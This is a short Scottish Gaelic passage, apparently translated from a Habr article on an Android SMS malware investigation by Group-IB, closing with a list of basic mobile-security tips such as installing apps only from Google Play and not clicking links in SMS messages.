Mar a bha e dha-rìribh
Gu fortanach, thionndaidh an neach a fhuair an teachdaireachd SMS a chaidh a mhìneachadh aig toiseach na h-artaigil gu bhith na eòlaiche cybersecurity. Mar sin, tha an dreach fìor, neo-stiùiriche eadar-dhealaichte bhon fhear a chaidh innse na bu thràithe: fhuair neach SMS inntinneach, agus às deidh sin thug e dha sgioba fiosrachaidh sealg bagairt Buidheann-IB. Is e toradh an ionnsaigh an artaigil seo. Deireadh sona, ceart? Ach, chan eil a h-uile sgeulachd a 'tighinn gu crìch cho soirbheachail, agus gus nach bi an fheadhainn agad coltach ri gearradh stiùiriche le call airgid, sa mhòr-chuid de chùisean tha e gu leòr cumail ris na riaghailtean fada a leanas:
- na stàlaich tagraidhean airson inneal gluasadach le Android OS bho thùs sam bith a bharrachd air Google Play
- Nuair a bhios tu a’ stàladh tagradh, thoir aire shònraichte do na còraichean a dh’ iarras an tagradh
- thoir an aire do leudachadh nam faidhlichean a chaidh a luchdachadh sìos
- stàlaich ùrachaidhean Android OS gu cunbhalach
- na tadhail air goireasan amharasach agus na luchdaich sìos faidhlichean às an sin
- Na cliog air ceanglaichean a gheibhear ann am teachdaireachdan SMS.
Source: www.habr.com